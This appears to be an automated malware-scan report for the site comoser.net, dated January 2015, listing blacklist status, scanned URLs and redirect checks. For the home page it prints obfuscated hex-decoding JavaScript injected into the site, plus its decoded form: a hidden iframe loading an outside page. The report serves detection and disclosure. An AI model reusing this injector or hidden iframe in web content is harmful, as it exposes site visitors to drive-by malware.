Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=comoser.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://comoser.net/ | 200 OK Content-Length: 2794 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4ad7ad4255fa3(v4ad7ad4255fb3){ function v4ad7ad4255fc6 () {return 16;} return(parseInt(v4ad7ad4255fb3,v4ad7ad4255fc6()));}function v4ad7ad425600d(v4ad7ad425601b){ function v4ad7ad425606f () {var v4ad7ad425607d=2; return v4ad7ad425607d;} var v4ad7ad4256029='';for(v4ad7ad425605e=0; v4ad7ad425605e<v4ad7ad425601b.length; v4ad7ad425605e+=v4ad7ad425606f()){ v4ad7ad4256029+=(String.fromCharCode(v4ad7ad4255fa3(v4ad7ad425601b.substr(v4ad7ad425605e, v4ad7ad425606f()))));}return v4ad7ad4256029;} document.write(v4ad7ad425600d('3C696672616D65206E616D653D27363432396232356527207372633D27687474703A2F2F63312E74657374696E676E65777A7A7A2E636F6D2F696E6465782E706870272077696474683D343935206865696768743D323930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='6429b25e' src='http://c1.testingnewzzz.com/index.php' width=495 height=290 style='display:none'></iframe> Antivirus reports:
| ||
http://comoser.net/guestbook/guestbook.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://comoser.net/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://comoser.net/cgi-bin/openwebmail/openwebmail.pl | 200 OK Content-Length: 5772 Content-Type: text/html | clean |
http://comoser.net/openwebmail/openwebmail.html | 200 OK Content-Length: 74404 Content-Type: text/html | clean |
http://comoser.net/openwebmail/ | 200 OK Content-Length: 74404 Content-Type: text/html | clean |
http://comoser.net/openwebmail/doc/readme.txt | 200 OK Content-Length: 51409 Content-Type: text/plain | clean |
http://you_server_domainname/cgi-bin/openwebmail/userstat.pl | 500 Can't connect to you_server_domainname:80 Content-Length: 196 Content-Type: text/plain | clean |
http://you_server_domainname/cgi-bin/openwebmail/userstat.pl?playsound=1 | 500 Can't connect to you_server_domainname:80 Content-Length: 196 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/changes.txt | 200 OK Content-Length: 39803 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/files.txt | 200 OK Content-Length: 5877 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/faq.txt | HTTP/1.1 200 OK Connection: close Date: Fri, 23 Jan 2015 11:02:42 GMT Accept-Ranges: bytes ETag: "97f8c00-12b8a-65cee780" Server: Apache Content-Length: 76682 Content-Type: text/plain; charset=UTF-8 Last-Modified: Tue, 01 Feb 2005 06:39:42 GMT | clean |
http://your_server/cgi-bin/openwebmail/openwebmail.pl | 500 Can't connect to your_server:80 Content-Length: 186 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/doc/copyright.txt | 200 OK Content-Length: 17978 Content-Type: text/plain | clean |
http://comoser.net/openwebmail/help/en/index.html | 200 OK Content-Length: 6135 Content-Type: text/html | clean |
http://comoser.net/openwebmail/help/en/templates_and_data/makewin.js | 200 OK Content-Length: 73 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: comoser.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 11:02:34 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: comoser.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 11:02:34 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: comoser.net
Referer: http://www.google.com/search?q=comoser.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: comoser.net
Referer: http://www.google.com/search?q=comoser.net
Result:
The result is similar to the first query. There are no suspicious redirects found.